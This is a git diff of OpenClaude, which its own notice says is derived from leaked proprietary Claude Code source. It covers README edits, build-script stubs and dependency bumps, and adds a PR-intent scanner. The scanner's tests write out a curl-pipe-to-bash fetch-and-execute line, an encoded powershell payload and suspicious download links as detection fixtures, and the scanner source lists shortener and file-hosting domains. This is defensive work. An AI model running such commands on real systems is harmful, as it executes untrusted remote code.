## Provenance & Legal Notice
OpenClaude is derived from Anthropic's Claude Code CLI source code, which was
inadvertently exposed in March 2026 through a packaging error in npm. The
original Claude Code source is proprietary software owned by Anthropic PBC.
This project adds multi-provider support, strips telemetry, and adapts the
codebase for open use. It is not an authorized fork or open-source release
by Anthropic.
**"Claude" and "Claude Code" are trademarks of Anthropic PBC.**
Contributors should be aware that the legal status of distributing code
derived from Anthropic's proprietary source is unresolved. See the LICENSE
file for details.
---
## Quick Start ## Quick Start
@@ -37,7 +28,7 @@ file for details.
npm install -g @gitlawb/openclaude npm install -g @gitlawb/openclaude
``` ```
If the npm install path later reports `ripgrep not found`, install ripgrep system-wide and confirm `rg --version` works in the same terminal before starting OpenClaude. If the install later reports `ripgrep not found`, install ripgrep system-wide and confirm `rg --version` works in the same terminal before starting OpenClaude.
### Start ### Start
@@ -47,8 +38,8 @@ openclaude
Inside OpenClaude: Inside OpenClaude:
- run `/provider` for guided setup of OpenAI-compatible, Gemini, Ollama, or Codex profiles - run `/provider` for guided provider setup and saved profiles
- run `/onboard-github` for GitHub Models setup - run `/onboard-github` for GitHub Models onboarding
### Fastest OpenAI setup ### Fastest OpenAI setup
@@ -94,8 +85,6 @@ $env:OPENAI_MODEL="qwen2.5-coder:7b"
openclaude openclaude
``` ```
---
## Setup Guides ## Setup Guides
Beginner-friendly guides: Beginner-friendly guides:
@@ -109,38 +98,26 @@ Advanced and source-build guides:
- [Advanced Setup](docs/advanced-setup.md) - [Advanced Setup](docs/advanced-setup.md)
- [Android Install](ANDROID_INSTALL.md) - [Android Install](ANDROID_INSTALL.md)
---
## Supported Providers
| Provider | Setup Path | Notes |
| --- | --- | --- |
-| OpenAI-compatible | `/provider` or env vars | Works with OpenAI, OpenRouter, DeepSeek, Groq, Mistral, LM Studio, and compatible local `/v1` servers |
+| OpenAI-compatible | `/provider` or env vars | Works with OpenAI, OpenRouter, DeepSeek, Groq, Mistral, LM Studio, and other compatible `/v1` servers |
-| Gemini | `/provider` or env vars | Google Gemini support through the runtime provider layer |
+| Gemini | `/provider` or env vars | Supports API key, access token, or local ADC workflow on current `main` |
| GitHub Models | `/onboard-github` | Interactive onboarding with saved credentials |
| Codex | `/provider` | Uses existing Codex credentials when available |
| Ollama | `/provider` or env vars | Local inference with no API key |
| Atomic Chat | advanced setup | Local Apple Silicon backend |
| Bedrock / Vertex / Foundry | env vars | Additional provider integrations for supported environments |
---
## What Works
-- Tool-driven coding workflows
-  Bash, file read/write/edit, grep, glob, agents, tasks, MCP, and slash commands
-- Streaming responses
-  Real-time token output and tool progress
-- Tool calling
-  Multi-step tool loops with model calls, tool execution, and follow-up responses
-- Images
-  URL and base64 image inputs for providers that support vision
-- Provider profiles
-  Guided setup plus saved `.openclaude-profile.json` support
-- Local and remote model backends
-  Cloud APIs, local servers, and Apple Silicon local inference
+- **Tool-driven coding workflows**: Bash, file read/write/edit, grep, glob, agents, tasks, MCP, and slash commands
+- **Streaming responses**: Real-time token output and tool progress
+- **Tool calling**: Multi-step tool loops with model calls, tool execution, and follow-up responses
+- **Images**: URL and base64 image inputs for providers that support vision
+- **Provider profiles**: Guided setup plus saved `.openclaude-profile.json` support
+- **Local and remote model backends**: Cloud APIs, local servers, and Apple Silicon local inference
---
## Provider Notes
@@ -153,13 +130,9 @@ OpenClaude supports multiple providers, but behavior is not identical across all
For best results, use models with strong tool/function calling support.
---
## Agent Routing
-Route different agents to different AI providers within the same session. Useful for cost optimization (cheap model for code review, powerful model for complex coding) or leveraging model strengths.
+OpenClaude can route different agents to different models through settings-based routing. This is useful for cost optimization or splitting work by model strength.
-### Configuration
Add to `~/.claude/settings.json`:
@@ -185,29 +158,19 @@ Add to `~/.claude/settings.json`:
}
```
-### How It Works
-- **agentModels**: Maps model names to OpenAI-compatible API endpoints
-- **agentRouting**: Maps agent types or team member names to model names
-- **Priority**: `name` > `subagent_type` > `"default"` > global provider
-- **Matching**: Case-insensitive, hyphen/underscore equivalent (`general-purpose` = `general_purpose`)
-- **Teams**: Team members are routed by their `name` — no extra config needed
-When no routing match is found, the global provider (env vars) is used as fallback.
+When no routing match is found, the global provider remains the fallback.
> **Note:** `api_key` values in `settings.json` are stored in plaintext. Keep this file private and do not commit it to version control.
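The routing lookup described in this section (name over subagent type over `"default"`, with case-insensitive, hyphen/underscore-equivalent matching) can be sketched as follows. This is an illustrative TypeScript sketch; `resolveModel`, `normalizeKey`, and the argument shapes are hypothetical names, not OpenClaude's actual implementation.

```typescript
// Hypothetical sketch of settings-based agent routing; names are illustrative.
type AgentRouting = Record<string, string>

// Case-insensitive, hyphen/underscore-equivalent key normalization,
// so `general-purpose` and `General_Purpose` hit the same entry.
function normalizeKey(key: string): string {
  return key.toLowerCase().replace(/_/g, '-')
}

function resolveModel(
  routing: AgentRouting,
  agent: { name?: string; subagent_type?: string },
): string | undefined {
  const table = new Map(
    Object.entries(routing).map(([key, model]) => [normalizeKey(key), model]),
  )
  // Priority: name > subagent_type > "default"; when nothing matches,
  // the caller falls back to the global provider.
  for (const candidate of [agent.name, agent.subagent_type, 'default']) {
    if (candidate !== undefined) {
      const model = table.get(normalizeKey(candidate))
      if (model !== undefined) return model
    }
  }
  return undefined
}
```

For example, `resolveModel({ general_purpose: 'small-model' }, { subagent_type: 'General-Purpose' })` resolves to `'small-model'` despite the case and separator differences.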
---
## Web Search and Fetch
-By default, `WebSearch` now works on non-Anthropic models using DuckDuckGo. This gives GPT-4o, DeepSeek, Gemini, Ollama, and other OpenAI-compatible providers a free web search path out of the box.
+By default, `WebSearch` works on non-Anthropic models using DuckDuckGo. This gives GPT-4o, DeepSeek, Gemini, Ollama, and other OpenAI-compatible providers a free web search path out of the box.
> **Note:** DuckDuckGo fallback works by scraping search results and may be rate-limited, blocked, or subject to DuckDuckGo's Terms of Service. If you want a more reliable supported option, configure Firecrawl.
-For Anthropic-native backends (Anthropic/Vertex/Foundry) and Codex responses, OpenClaude keeps the native provider web search behavior.
+For Anthropic-native backends and Codex responses, OpenClaude keeps the native provider web search behavior.
-`WebFetch` works but uses basic HTTP plus HTML-to-markdown conversion. That fails on JavaScript-rendered pages (React, Next.js, Vue SPAs) and sites that block plain HTTP requests.
+`WebFetch` works, but its basic HTTP plus HTML-to-markdown path can still fail on JavaScript-rendered sites or sites that block plain HTTP requests.
Set a [Firecrawl](https://firecrawl.dev) API key if you want Firecrawl-powered search/fetch behavior:
@@ -217,14 +180,12 @@ export FIRECRAWL_API_KEY=your-key-here
With Firecrawl enabled:
-- `WebSearch` can use Firecrawl's search API (while DuckDuckGo remains the default free path for non-Claude models)
+- `WebSearch` can use Firecrawl's search API while DuckDuckGo remains the default free path for non-Claude models
- `WebFetch` uses Firecrawl's scrape endpoint instead of raw HTTP, handling JS-rendered pages correctly
Free tier at [firecrawl.dev](https://firecrawl.dev) includes 500 credits. The key is optional.
----
-## Source Build
+## Source Build And Local Development
```bash
bun install
@@ -235,22 +196,78 @@ node dist/cli.mjs
Helpful commands:
- `bun run dev`
- `bun test`
- `bun run test:coverage`
- `bun run security:pr-scan -- --base origin/main`
- `bun run smoke`
- `bun run doctor:runtime`
- `bun run verify:privacy`
- focused `bun test ...` runs for the areas you touch
----
+## Testing And Coverage
OpenClaude uses Bun's built-in test runner for unit tests.
Run the full unit suite:
```bash
bun test
```
Generate unit test coverage:
```bash
bun run test:coverage
```
Open the visual coverage report:
```bash
open coverage/index.html
```
If you already have `coverage/lcov.info` and only want to rebuild the UI:
```bash
bun run test:coverage:ui
```
Use focused test runs when you only touch one area:
- `bun run test:provider`
- `bun run test:provider-recommendation`
- `bun test path/to/file.test.ts`
Recommended contributor validation before opening a PR:
- `bun run build`
- `bun run smoke`
- `bun run test:coverage` for broader unit coverage when your change affects shared runtime or provider logic
- focused `bun test ...` runs for the files and flows you changed
Coverage output is written to `coverage/lcov.info`, and OpenClaude also generates a git-activity-style heatmap at `coverage/index.html`.
## Repository Structure
- `src/` - core CLI/runtime
- `scripts/` - build, verification, and maintenance scripts
- `docs/` - setup, contributor, and project documentation
- `python/` - standalone Python helpers and their tests
- `vscode-extension/openclaude-vscode/` - VS Code extension
- `.github/` - repo automation, templates, and CI configuration
- `bin/` - CLI launcher entrypoints
## VS Code Extension
-The repo includes a VS Code extension in [`vscode-extension/openclaude-vscode`](vscode-extension/openclaude-vscode) for OpenClaude launch integration and theme support.
+The repo includes a VS Code extension in [`vscode-extension/openclaude-vscode`](vscode-extension/openclaude-vscode) for OpenClaude launch integration, provider-aware control-center UI, and theme support.
---
## Security
If you believe you found a security issue, see [SECURITY.md](SECURITY.md).
----
+## Community
- Use [GitHub Discussions](https://github.com/Gitlawb/openclaude/discussions) for Q&A, ideas, and community conversation
- Use [GitHub Issues](https://github.com/Gitlawb/openclaude/issues) for confirmed bugs and actionable feature work
## Contributing
@@ -259,19 +276,16 @@ Contributions are welcome.
For larger changes, open an issue first so the scope is clear before implementation. Helpful validation commands include:
- `bun run build`
- `bun run test:coverage`
- `bun run smoke`
- focused `bun test ...` runs for touched areas
---
## Disclaimer
OpenClaude is an independent community project and is not affiliated with, endorsed by, or sponsored by Anthropic.
-"Claude" and "Claude Code" are trademarks of Anthropic. OpenClaude originated from the Claude Code codebase and has since been substantially modified to support multiple providers and open use.
+"Claude" and "Claude Code" are trademarks of Anthropic PBC. See [LICENSE](LICENSE) for details.
---
## License
-MIT
+See [LICENSE](LICENSE).


@@ -1,7 +1,13 @@
-import { join } from 'path'
+import { join, win32 } from 'path'
import { pathToFileURL } from 'url'
export function getDistImportSpecifier(baseDir) {
-const distPath = join(baseDir, '..', 'dist', 'cli.mjs')
+if (/^[A-Za-z]:\\/.test(baseDir)) {
const distPath = win32.join(baseDir, '..', 'dist', 'cli.mjs')
return `file:///${distPath.replace(/\\/g, '/')}`
}
const joinImpl = join
const distPath = joinImpl(baseDir, '..', 'dist', 'cli.mjs')
return pathToFileURL(distPath).href
}
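The Windows branch of `getDistImportSpecifier` above can be exercised in isolation. The sketch below is hypothetical: it hand-rolls the parent-directory join for this one fixed suffix instead of importing `node:path`, so the behavior is the same on any host platform.

```typescript
// Illustrative sketch of the Windows-drive special case shown in the diff:
// absolute Windows paths are turned into file:/// URLs by hand, so the
// result does not depend on the host platform's `path` flavor.
function toDistUrl(baseDir: string): string {
  if (/^[A-Za-z]:\\/.test(baseDir)) {
    // Equivalent of win32.join(baseDir, '..', 'dist', 'cli.mjs') for this
    // fixed suffix: drop the last segment, then append dist\cli.mjs.
    const parent = baseDir.replace(/\\[^\\]+$/, '')
    const distPath = `${parent}\\dist\\cli.mjs`
    return `file:///${distPath.replace(/\\/g, '/')}`
  }
  // POSIX-style paths keep the simple relative form.
  return `file://${baseDir}/../dist/cli.mjs`
}
```

For example, `toDistUrl('C:\\tools\\bin')` yields `'file:///C:/tools/dist/cli.mjs'`, which is why the real function bypasses `pathToFileURL` on Windows-style inputs.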


@@ -36,6 +36,7 @@
"cli-highlight": "2.1.11",
"code-excerpt": "4.0.0",
"commander": "12.1.0",
"cross-spawn": "7.0.6",
"diff": "8.0.3",
"duck-duck-scrape": "^2.2.7",
"emoji-regex": "10.6.0",
@@ -50,7 +51,7 @@
"ignore": "7.0.5",
"indent-string": "5.0.0",
"jsonc-parser": "3.3.1",
-"lodash-es": "4.18.0",
+"lodash-es": "4.18.1",
"lru-cache": "11.2.7",
"marked": "15.0.12",
"p-map": "7.0.4",
@@ -87,6 +88,9 @@
},
},
},
"overrides": {
"lodash-es": "4.18.1",
},
"packages": {
"@alcalzone/ansi-tokenize": ["@alcalzone/ansi-tokenize@0.3.0", "", { "dependencies": { "ansi-styles": "^6.2.1", "is-fullwidth-code-point": "^5.0.0" } }, "sha512-p+CMKJ93HFmLkjXKlXiVGlMQEuRb6H0MokBSwUsX+S6BRX8eV5naFZpQJFfJHjRZY0Hmnqy1/r6UWl3x+19zYA=="],
@@ -656,7 +660,7 @@
"locate-path": ["locate-path@5.0.0", "", { "dependencies": { "p-locate": "^4.1.0" } }, "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g=="],
-"lodash-es": ["lodash-es@4.18.0", "", {}, "sha512-koAgswPPA+UTaPN64Etp+PGP+WT6oqOS2NMi5yDkMaiGw9qY4VxQbQF0mtKMyr4BlTznWyzePV5UpECTJQmSUA=="],
+"lodash-es": ["lodash-es@4.18.1", "", {}, "sha512-J8xewKD/Gk22OZbhpOVSwcs60zhd95ESDwezOFuA3/099925PdHJ7OFHNTGtajL3AlZkykD32HykiMo+BIBI8A=="],
"lodash.camelcase": ["lodash.camelcase@4.3.0", "", {}, "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA=="],
@@ -890,8 +894,6 @@
"zod-to-json-schema": ["zod-to-json-schema@3.25.2", "", { "peerDependencies": { "zod": "^3.25.28 || ^4" } }, "sha512-O/PgfnpT1xKSDeQYSCfRI5Gy3hPf91mKVDuYLUHZJMiDFptvP41MSnWofm8dnCm0256ZNfZIM7DSzuSMAFnjHA=="],
-"@anthropic-ai/sandbox-runtime/lodash-es": ["lodash-es@4.17.23", "", {}, "sha512-kVI48u3PZr38HdYz98UmfPnXl2DXrpdctLrFLCd3kOx1xUkOmpFPx7gCWWM5MPkL/fD8zb+Ph0QzjGFs4+hHWg=="],
"@aws-crypto/crc32/@aws-crypto/util": ["@aws-crypto/util@5.2.0", "", { "dependencies": { "@aws-sdk/types": "^3.222.0", "@smithy/util-utf8": "^2.0.0", "tslib": "^2.6.2" } }, "sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ=="],
"@aws-crypto/crc32/tslib": ["tslib@2.8.1", "", {}, "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w=="],


@@ -1,6 +1,6 @@
{
"name": "@gitlawb/openclaude",
-"version": "0.1.7",
+"version": "0.1.8",
"description": "Claude Code opened to any LLM — OpenAI, Gemini, DeepSeek, Ollama, and 200+ models",
"type": "module",
"bin": {
@@ -31,6 +31,10 @@
"dev:fast": "bun run profile:fast && bun run dev:ollama:fast",
"dev:code": "bun run profile:code && bun run dev:profile",
"start": "node dist/cli.mjs",
"test": "bun test",
"test:coverage": "bun test --coverage --coverage-reporter=lcov --coverage-dir=coverage --max-concurrency=1 && bun run scripts/render-coverage-heatmap.ts",
"test:coverage:ui": "bun run scripts/render-coverage-heatmap.ts",
"security:pr-scan": "bun run scripts/pr-intent-scan.ts",
"test:provider-recommendation": "bun test src/utils/providerRecommendation.test.ts src/utils/providerProfile.test.ts",
"typecheck": "tsc --noEmit",
"smoke": "bun run build && node dist/cli.mjs --version",
@@ -76,6 +80,7 @@
"cli-highlight": "2.1.11",
"code-excerpt": "4.0.0",
"commander": "12.1.0",
"cross-spawn": "7.0.6",
"diff": "8.0.3",
"duck-duck-scrape": "^2.2.7",
"emoji-regex": "10.6.0",
@@ -90,7 +95,7 @@
"ignore": "7.0.5",
"indent-string": "5.0.0",
"jsonc-parser": "3.3.1",
-"lodash-es": "4.18.0",
+"lodash-es": "4.18.1",
"lru-cache": "11.2.7",
"marked": "15.0.12",
"p-map": "7.0.4",
@@ -145,5 +150,8 @@
"license": "SEE LICENSE FILE",
"publishConfig": {
"access": "public"
},
"overrides": {
"lodash-es": "4.18.1"
}
}

python/__init__.py (new file)

@@ -0,0 +1 @@
# Python helper package for standalone provider-side utilities.

python/tests/__init__.py (new file)

@@ -0,0 +1 @@
# Pytest package marker for the Python helper test suite.

python/tests/conftest.py (new file)

@@ -0,0 +1,5 @@
from pathlib import Path
import sys
# Make the sibling `python/` helper modules importable from this test package.
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))


@@ -1,6 +1,6 @@
"""
test_atomic_chat_provider.py
-Run: pytest test_atomic_chat_provider.py -v
+Run: pytest python/tests/test_atomic_chat_provider.py -v
"""

import pytest


@@ -1,6 +1,6 @@
"""
test_ollama_provider.py
-Run: pytest test_ollama_provider.py -v
+Run: pytest python/tests/test_ollama_provider.py -v
"""

import pytest
@@ -13,25 +13,31 @@ from ollama_provider import (
    check_ollama_running,
)

def test_normalize_strips_prefix():
    assert normalize_ollama_model("ollama/llama3:8b") == "llama3:8b"

def test_normalize_no_prefix():
    assert normalize_ollama_model("codellama:34b") == "codellama:34b"

def test_normalize_empty():
    assert normalize_ollama_model("") == ""

def test_converts_string_content():
    messages = [{"role": "user", "content": "Hello!"}]
    result = anthropic_to_ollama_messages(messages)
    assert result == [{"role": "user", "content": "Hello!"}]

def test_converts_text_block_list():
    messages = [{"role": "user", "content": [{"type": "text", "text": "What is Python?"}]}]
    result = anthropic_to_ollama_messages(messages)
    assert result[0]["content"] == "What is Python?"

def test_converts_image_block_to_placeholder():
    messages = [{"role": "user", "content": [{"type": "image", "source": {}}, {"type": "text", "text": "Describe this"}]}]
    result = anthropic_to_ollama_messages(messages)
@@ -68,6 +74,7 @@ def test_converts_multi_turn():
    assert len(result) == 3
    assert result[1]["role"] == "assistant"

@pytest.mark.asyncio
async def test_ollama_running_true():
    mock_response = MagicMock()
@@ -77,6 +84,7 @@ async def test_ollama_running_true():
    result = await check_ollama_running()
    assert result is True

@pytest.mark.asyncio
async def test_ollama_running_false_on_exception():
    with patch("ollama_provider.httpx.AsyncClient") as MockClient:
@@ -84,6 +92,7 @@ async def test_ollama_running_false_on_exception():
        result = await check_ollama_running()
        assert result is False

@pytest.mark.asyncio
async def test_list_models_returns_names():
    mock_response = MagicMock()
@@ -95,6 +104,7 @@ async def test_list_models_returns_names():
    models = await list_ollama_models()
    assert "llama3:8b" in models

@pytest.mark.asyncio
async def test_ollama_chat_returns_anthropic_format():
    mock_response = MagicMock()
@@ -115,9 +125,11 @@ async def test_ollama_chat_returns_anthropic_format():
    assert result["role"] == "assistant"
    assert "42" in result["content"][0]["text"]

@pytest.mark.asyncio
async def test_ollama_chat_prepends_system():
    captured = {}

    async def mock_post(url, json=None, **kwargs):
        captured.update(json or {})
        m = MagicMock()
@@ -134,7 +146,7 @@ async def test_ollama_chat_prepends_system():
    await ollama_chat(
        model="llama3:8b",
        messages=[{"role": "user", "content": "Hi"}],
-        system="Be helpful."
+        system="Be helpful.",
    )
    assert captured["messages"][0]["role"] == "system"
    assert "helpful" in captured["messages"][0]["content"]


@@ -2,7 +2,7 @@
test_smart_router.py
--------------------
Tests for the SmartRouter.
-Run: pytest test_smart_router.py -v
+Run: pytest python/tests/test_smart_router.py -v
"""

import pytest
@@ -18,6 +18,7 @@ from smart_router import SmartRouter, Provider
def fake_api_key(monkeypatch):
    monkeypatch.setenv("FAKE_KEY", "test-key")

def make_provider(name, healthy=True, configured=True,
                  latency=100.0, cost=0.002, errors=0, requests=0):
    p = Provider(
@@ -33,7 +34,7 @@ def make_provider(name, healthy=True, configured=True,
    p.error_count = errors
    p.request_count = requests
    if not configured:
-        p.api_key_env = ""  # makes is_configured False for non-ollama
+        p.api_key_env = ""  # makes is_configured False for non-local providers
    return p


@@ -3,7 +3,7 @@
 * distributable JS file using Bun's bundler.
 *
 * Handles:
- * - bun:bundle feature() flags → all false (disables internal-only features)
+ * - bun:bundle feature() flags for the open build
 * - MACRO.* globals → inlined version/build-time constants
 * - src/ path aliases
 */
@@ -14,8 +14,9 @@ import { noTelemetryPlugin } from './no-telemetry-plugin'
const pkg = JSON.parse(readFileSync('./package.json', 'utf-8'))
const version = pkg.version
-// Feature flags — all disabled for the open build.
-// These gate Anthropic-internal features (voice, proactive, kairos, etc.)
+// Feature flags for the open build.
+// Most Anthropic-internal features stay off; open-build features can be
+// selectively enabled here when their full source exists in the mirror.
const featureFlags: Record<string, boolean> = {
VOICE_MODE: false,
PROACTIVE: false,
@@ -37,7 +38,7 @@ const featureFlags: Record<string, boolean> = {
TRANSCRIPT_CLASSIFIER: false,
WEB_BROWSER_TOOL: false,
MESSAGE_ACTIONS: false,
-BUDDY: false,
+BUDDY: true,
CHICAGO_MCP: false,
COWORKER_TYPE_TELEMETRY: false,
}
@@ -110,7 +111,7 @@ export async function handleBgFlag() { throw new Error("Background sessions are
build.onLoad(
{ filter: /.*/, namespace: 'bun-bundle-shim' },
() => ({
-contents: `export function feature(name) { return false; }`,
+contents: `const featureFlags = ${JSON.stringify(featureFlags)};\nexport function feature(name) { return featureFlags[name] ?? false; }`,
loader: 'js',
}),
)
@@ -250,6 +251,103 @@ export const SeverityNumber = {};
loader: 'js',
}),
)
// Pre-scan: find all missing modules that need stubbing
// (Bun's onResolve corrupts module graph even when returning null,
// so we use exact-match resolvers instead of catch-all patterns)
const fs = require('fs')
const pathMod = require('path')
const srcDir = pathMod.resolve(__dirname, '..', 'src')
const missingModules = new Set<string>()
const missingModuleExports = new Map<string, Set<string>>()
// Known missing external packages
for (const pkg of [
'@ant/computer-use-mcp',
'@ant/computer-use-mcp/sentinelApps',
'@ant/computer-use-mcp/types',
'@ant/computer-use-swift',
'@ant/computer-use-input',
]) {
missingModules.add(pkg)
}
// Scan source to find imports that can't resolve
function scanForMissingImports() {
function walk(dir: string) {
for (const ent of fs.readdirSync(dir, { withFileTypes: true })) {
const full = pathMod.join(dir, ent.name)
if (ent.isDirectory()) { walk(full); continue }
if (!/\.(ts|tsx)$/.test(ent.name)) continue
const code: string = fs.readFileSync(full, 'utf-8')
// Collect all imports
for (const m of code.matchAll(/import\s+(?:\{([^}]*)\}|(\w+))?\s*(?:,\s*\{([^}]*)\})?\s*from\s+['"](.*?)['"]/g)) {
const specifier = m[4]
const namedPart = m[1] || m[3] || ''
const names = namedPart.split(',')
.map((s: string) => s.trim().replace(/^type\s+/, ''))
.filter((s: string) => s && !s.startsWith('type '))
// Check src/tasks/ non-relative imports
if (specifier.startsWith('src/tasks/')) {
const resolved = pathMod.resolve(__dirname, '..', specifier)
const candidates = [
resolved,
`${resolved}.ts`, `${resolved}.tsx`,
resolved.replace(/\.js$/, '.ts'), resolved.replace(/\.js$/, '.tsx'),
pathMod.join(resolved, 'index.ts'), pathMod.join(resolved, 'index.tsx'),
]
if (!candidates.some((c: string) => fs.existsSync(c))) {
missingModules.add(specifier)
}
}
// Check relative .js imports
else if (specifier.endsWith('.js') && (specifier.startsWith('./') || specifier.startsWith('../'))) {
const dir2 = pathMod.dirname(full)
const resolved = pathMod.resolve(dir2, specifier)
const tsVariant = resolved.replace(/\.js$/, '.ts')
const tsxVariant = resolved.replace(/\.js$/, '.tsx')
if (!fs.existsSync(resolved) && !fs.existsSync(tsVariant) && !fs.existsSync(tsxVariant)) {
missingModules.add(specifier)
}
}
// Track named exports for missing modules
if (names.length > 0) {
if (!missingModuleExports.has(specifier)) missingModuleExports.set(specifier, new Set())
for (const n of names) missingModuleExports.get(specifier)!.add(n)
}
}
}
}
walk(srcDir)
}
scanForMissingImports()
// Register exact-match resolvers for each missing module
for (const mod of missingModules) {
const escaped = mod.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')
build.onResolve({ filter: new RegExp(`^${escaped}$`) }, () => ({
path: mod,
namespace: 'missing-module-stub',
}))
}
build.onLoad(
{ filter: /.*/, namespace: 'missing-module-stub' },
(args) => {
const names = missingModuleExports.get(args.path) ?? new Set()
const exports = [...names].map(n => `export const ${n} = noop;`).join('\n')
return {
contents: `
const noop = () => null;
export default noop;
${exports}
`,
loader: 'js',
}
},
)
},
},
],
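The `missing-module-stub` loader above can be factored as a pure function. This hypothetical standalone sketch mirrors the generated module source (a no-op default export plus one no-op per collected named import); `makeStubSource` is an illustrative name, not part of the plugin.

```typescript
// Hypothetical standalone version of the missing-module stub generation:
// every named import collected during the pre-scan becomes a no-op export,
// so unresolved modules compile and every call simply returns null.
function makeStubSource(exportNames: Iterable<string>): string {
  const named = [...exportNames]
    .map(name => `export const ${name} = noop;`)
    .join('\n')
  return `const noop = () => null;\nexport default noop;\n${named}\n`
}
```

Feeding this source to the bundler for each missing specifier is what lets the open build link against deleted internal modules without catch-all `onResolve` patterns.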


@@ -203,6 +203,60 @@ export async function submitTranscriptShare() { return { success: false }; }
'services/internalLogging': `
export async function logPermissionContextForAnts() {}
export const getContainerId = async () => null;
`,
// ─── Deleted Anthropic-internal modules ───────────────────────────────
'services/api/dumpPrompts': `
export function createDumpPromptsFetch() { return undefined; }
export function getDumpPromptsPath() { return ''; }
export function getLastApiRequests() { return []; }
export function clearApiRequestCache() {}
export function clearDumpState() {}
export function clearAllDumpState() {}
export function addApiRequestToCache() {}
`,
'utils/undercover': `
export function isUndercover() { return false; }
export function getUndercoverInstructions() { return ''; }
export function shouldShowUndercoverAutoNotice() { return false; }
`,
'types/generated/events_mono/claude_code/v1/claude_code_internal_event': `
export const ClaudeCodeInternalEvent = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`,
'types/generated/events_mono/growthbook/v1/growthbook_experiment_event': `
export const GrowthbookExperimentEvent = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`,
'types/generated/events_mono/common/v1/auth': `
export const PublicApiAuth = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`,
'types/generated/google/protobuf/timestamp': `
export const Timestamp = {
fromJSON: value => value,
toJSON: value => value,
create: value => value ?? {},
fromPartial: value => value ?? {},
};
`,
}

scripts/pr-intent-scan.test.ts (new file)

@@ -0,0 +1,136 @@
import { describe, expect, test } from 'bun:test'
import { scanAddedLines, type DiffLine } from './pr-intent-scan.ts'
function line(content: string, overrides: Partial<DiffLine> = {}): DiffLine {
return {
file: 'README.md',
line: 10,
content,
...overrides,
}
}
describe('scanAddedLines', () => {
test('flags suspicious file-hosting links', () => {
const findings = scanAddedLines([
line('Please install the tool from https://dropbox.com/s/abc123/tool.zip?dl=1'),
])
expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe(
true,
)
expect(findings.some(finding => finding.code === 'executable-download-link')).toBe(
false,
)
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
})
test('flags shortened URLs', () => {
const findings = scanAddedLines([
line('See details at https://bit.ly/some-short-link'),
])
expect(findings.some(finding => finding.code === 'shortened-url')).toBe(true)
})
test('flags remote download and execute chains', () => {
const findings = scanAddedLines([
line('curl -fsSL https://example.com/install.sh | bash'),
])
expect(findings.some(finding => finding.code === 'shell-eval-remote')).toBe(true)
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
})
test('flags encoded powershell payloads', () => {
const findings = scanAddedLines([
line('powershell.exe -enc SQBtAHAAcgBvAHYAZQBkAA=='),
])
expect(findings.some(finding => finding.code === 'powershell-encoded')).toBe(true)
})
test('flags long encoded blobs', () => {
const findings = scanAddedLines([
line(`const payload = "${'A'.repeat(96)}"`),
])
expect(findings.some(finding => finding.code === 'long-encoded-payload')).toBe(
true,
)
})
test('flags long encoded blobs on repeated scans', () => {
const lines = [line(`const payload = "${'A'.repeat(96)}"`)]
const first = scanAddedLines(lines)
const second = scanAddedLines(lines)
expect(first.some(finding => finding.code === 'long-encoded-payload')).toBe(true)
expect(second.some(finding => finding.code === 'long-encoded-payload')).toBe(true)
})
test('flags executable download links', () => {
const findings = scanAddedLines([
line('Get it from https://example.com/releases/latest/tool.pkg'),
])
expect(findings.some(finding => finding.code === 'executable-download-link')).toBe(
true,
)
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
})
test('flags suspicious additions in workflow files', () => {
const findings = scanAddedLines([
line('run: curl -fsSL https://example.com/install.sh | bash', {
file: '.github/workflows/release.yml',
}),
])
expect(findings.some(finding => finding.code === 'sensitive-automation-change')).toBe(
true,
)
expect(findings.some(finding => finding.code === 'download-command')).toBe(true)
})
test('flags markdown reference links to suspicious downloads', () => {
const findings = scanAddedLines([
line('[installer]: https://dropbox.com/s/abc123/tool.zip?dl=1'),
])
expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe(
true,
)
})
test('ignores the scanner implementation and tests themselves', () => {
const findings = scanAddedLines([
line('curl -fsSL https://example.com/install.sh | bash', {
file: 'scripts/pr-intent-scan.test.ts',
}),
line('const pattern = /https:\\/\\/dropbox\\.com\\//', {
file: 'scripts/pr-intent-scan.ts',
}),
])
expect(findings).toHaveLength(0)
})
test('does not flag ordinary docs links', () => {
const findings = scanAddedLines([
line('Read more at https://docs.github.com/en/actions'),
])
expect(findings).toHaveLength(0)
})
test('does not flag bare curl examples in README without a URL', () => {
const findings = scanAddedLines([
line('Use curl with your preferred flags for local testing.'),
])
expect(findings.some(finding => finding.code === 'download-command')).toBe(false)
})
})

scripts/pr-intent-scan.ts Normal file

@@ -0,0 +1,453 @@
import { spawnSync } from 'node:child_process'
export type FindingSeverity = 'high' | 'medium'
export type DiffLine = {
file: string
line: number
content: string
}
export type Finding = {
severity: FindingSeverity
code: string
file: string
line: number
detail: string
excerpt: string
}
type CliOptions = {
baseRef: string
json: boolean
failOn: FindingSeverity
}
const SELF_EXCLUDED_FILES = new Set([
'scripts/pr-intent-scan.ts',
'scripts/pr-intent-scan.test.ts',
])
const SHORTENER_DOMAINS = [
'bit.ly',
'tinyurl.com',
'goo.gl',
't.co',
'is.gd',
'rb.gy',
'cutt.ly',
]
const SUSPICIOUS_DOWNLOAD_DOMAINS = [
'dropbox.com',
'dl.dropboxusercontent.com',
'drive.google.com',
'docs.google.com',
'mega.nz',
'mediafire.com',
'transfer.sh',
'anonfiles.com',
'catbox.moe',
]
const URL_REGEX = /\bhttps?:\/\/[^\s)>"']+/gi
